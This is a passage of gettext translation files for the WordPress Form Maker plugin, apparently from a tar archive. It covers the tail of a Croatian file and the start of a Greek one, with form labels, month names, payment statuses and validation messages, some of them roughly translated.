#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Vaš e-mail za provjeru istekla."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Provjera veze nije valjana."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "polje je obvezno."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "To nije valjana adresa e-pošte."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr "Ne možete odabrati bivši datume. Odaberite datum počevši od trenutne."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "vrijednost mora biti između "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "količina "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Vaš rezultat bi trebao biti manji od "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Naslov"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "prije"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "zad"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Srednji"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Area Code"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Broj telefona"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dolara "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Centi "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Iz "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Na"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "go "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Reset "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Odaberite polje"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Odaberite datum"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-el.po000060400000061337152434416630011610 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:52+0400\n"
"PO-Revision-Date: 2015-05-22 16:53+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: el\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Οδός"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Οδός Διεύθυνση 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Πόλη"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Πολιτεία / Επαρχία / Περιφέρεια"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Ταχυδρομική / Τ.Κ."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Χώρα"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Ιανουάριος"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Φεβρουάριος"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Μάρτιος"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Απρίλης"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Μάιος"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Ιούνιος"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Ιούλιος"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Αύγουστος"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Σεπτέμβριος"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Οκτώβριος"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Νοέμβριος"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Δεκέμβριος"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Σφάλματος, λανθασμένα τον κωδικό ασφαλείας."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"Ip σας είναι στη μαύρη λίστα. Παρακαλώ επικοινωνήστε με τον διαχειριστή της "
"ιστοσελίδας. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Το αρχείο υπερβαίνει το επιτρεπόμενο μέγεθος των"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr ""
"Λυπούμαστε, αλλά δεν έχετε δικαίωμα να ανεβάσετε αυτό το είδος του αρχείου."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Σφάλμα, το αρχείο δεν μπορεί να μετακινηθεί."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Αυτό το πεδίο %s απαιτεί μια μοναδική εγγραφή και αυτή η τιμή έχει ήδη "
"υποβληθεί."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Σφάλμα, e-mail δεν σταλεί."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Τίποτα δεν υποβλήθηκε."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Φόρμα σας υποβλήθηκε με επιτυχία."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Σφάλμα, e-mail δεν σταλεί."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Διεύθυνση ηλεκτρονικού ταχυδρομείου σας έχει ήδη επαληθευτεί."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Το email σας έχει επαληθευτεί με επιτυχία."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Επαλήθευση ηλεκτρονικού ταχυδρομείου σας έχει λήξει."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Σύνδεσμο επιβεβαίωσης δεν είναι έγκυρο."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "το πεδίο είναι υποχρεωτικό."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
